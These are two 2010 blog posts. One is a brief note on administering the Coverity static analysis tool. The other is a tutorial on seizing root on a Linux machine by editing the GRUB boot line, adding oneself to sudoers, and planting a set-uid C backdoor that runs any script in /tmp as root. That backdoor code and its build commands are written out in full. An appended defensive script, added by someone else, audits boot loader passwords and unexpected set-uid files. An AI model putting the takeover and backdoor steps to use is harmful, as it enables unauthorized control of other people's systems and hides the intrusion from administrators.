Friday, June 25, 2010

Coverity

I have recently been working on the Coverity Prevent product, a static source code analysis tool that identifies possible bugs in source code. The tool is pretty cool and was originally developed at Stanford University. It has been gaining a lot of momentum recently, with mature products and VC backing. It looks like many big companies are jumping on board with Coverity. It's a promising tool. But I think the final fate of the company, or the best deal, would be to be sold to a big software company like Microsoft or Symantec. Anyway, it's a good tool and I am the administrator of the tool in my department at Ericsson Canada.


--
Hao Leo Chen
http://leochen.net

Friday, June 18, 2010

How to hack the Linux box to get root permission

You have a Linux box with you, but you have only a normal user account.  You want to hack this box and get root permission.  Now, you have a solution.

Note: the following procedure works only when you use the GRUB boot loader. Never tested with LILO.

1. Reboot your machine.
2. Before Linux boots, press a key to bring up your boot loader interface.
3. In GRUB, press "e" to edit your boot loader line.
4. Add "init=/bin/bash" or "init=/bin/sh" to the end of your boot line.
5. Press Enter, then press "b" to boot.
6. Your system boots and you are root now, without logging in.
7. Bingo. You can hijack the system now. :-)
8. To be a good citizen, I would recommend adding your own user ID to the /etc/sudoers file using the "visudo" command.
You can then run "sudo bash" to get a shell with root permission. You still don't know the root password, but you can get root permission. This way, however, root will know it was you who hacked the system by checking the "/etc/sudoers" file.
9. To do something more secret, you can have a suid program execute your script as root.

I have a C program; you can build it and set the suid bit.

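#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main()
{
   /* The binary is suid root, so this switches the real uid to root too. */
   setuid(0);
   /* Run the script as root. */
   system("/tmp/myscript.sh");

   return 0;
}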

10. Save the program as t.c
11. gcc -o go t.c
12. chmod 4755 go

Now, you can put anything you want in /tmp/myscript.sh and run go. The /tmp/myscript.sh will be executed as root by go. Wow!

Don't do anything stupid that gets you into trouble. This is just a demonstration of a hacking technique on a Linux system.
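
The procedure above depends on a boot loader menu that anyone at the console can edit, and it leaves a set-uid binary behind. As an added example (not part of the original post), the shell functions below check a GRUB config for a password directive and list set-uid files that are missing from an allowlist. The allowlist file, its one-path-per-line format and the default paths are assumptions.

```shell
#!/bin/sh
# Added defensive example; not code from the original post.

# Exit 0 if the boot loader config $1 has a password directive at the start
# of a line: "password ..." (GRUB legacy menu.lst) or "password_pbkdf2 ..."
# (GRUB 2). Exit 2 if the file is unreadable. Without such a directive,
# anyone at the console can edit the boot line as in steps 3-5.
grub_has_password() {
    cfg=$1
    [ -r "$cfg" ] || return 2
    grep -Eq '^[[:space:]]*(password|password_pbkdf2)[[:space:]]' "$cfg"
}

# Print every set-uid regular file under directory $1 that is not listed in
# the allowlist file $2 (one absolute path per line; hypothetical format).
unexpected_suid() {
    root=$1
    allow=$2
    find "$root" -xdev -type f -perm -4000 2>/dev/null | sort |
    while IFS= read -r f; do
        grep -Fxq -- "$f" "$allow" 2>/dev/null || printf '%s\n' "$f"
    done
}

# Stand-alone use: sh audit.sh --audit [grub-config] [allowlist]
# Default paths are assumptions; adjust them for the distribution.
if [ "${1:-}" = "--audit" ]; then
    grub_has_password "${2:-/boot/grub/grub.cfg}" ||
        echo "WARN: no password directive found in boot loader config"
    unexpected_suid / "${3:-/etc/suid.allow}"
fi
```

Running the set-uid listing from cron and comparing it with a baseline taken at install time surfaces a binary like "go" the first time it appears; /etc/sudoers can be compared against a known-good copy in the same way.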